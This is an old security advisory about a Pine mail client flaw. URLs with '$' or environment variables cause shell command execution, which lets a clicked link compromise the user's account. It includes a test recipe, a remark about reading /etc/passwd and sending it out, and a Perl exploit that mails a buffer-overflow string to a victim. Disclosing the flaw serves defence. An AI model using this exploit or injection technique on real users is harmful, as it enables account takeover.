Pine vulnerable to expanding environment variables in URLs
30 Nov. 1999
Summary
It possible to cause Pine to execute shell commands upon visiting of a URL, enabling a remote attacker to execute shell commands simply by making the mail recipient click on a URL, effectively compromising the user's account.
Credit:
This vulnerability has been reported by: Jim Hebert.
The exploit code was provided by: CyberPsychotic
Vulnerable systems:
Pine version 4.10
Pine version 4.20
Immune systems:
Pine version 4.21
If a URL such as:
http://something/some/cgi$12345
Is provided to Pine, it will try to execute the part after the "$" sign as a shell command causing the URL to fail.
A quick test:
$ echo 'setenv WWW www.securiteam.com' >> .tcshrc
$ source .tcshrc
$ pine
Now mail yourself an email containing a link that looks like: http://$WWW))
This should cause you to visit SecuriTeam.com
Using this vulnerability people can at the very least, get a hold of your environment variables and store them in their web server access logs. At the worst case, people can get you to run shell commands (bad enough by itself) and have the output of them sent to them if they wish (think about cat /etc/passwd).
The following exploit code has been released to test for this vulnerability:
#!/usr/bin/perl
$sploit="A" x 1078;
$sploit .="\@1111"; # rh 6.0/pine4.10 would love return address 0x82d4528
# or higher..
open(FOO,"| /usr/sbin/sendmail -t");
print FOO "From: bogus\@yahoo.com\nTo: victim\@somehost\n\n";
print FOO "Mail me: mailto:$sploit";
close(FOO);
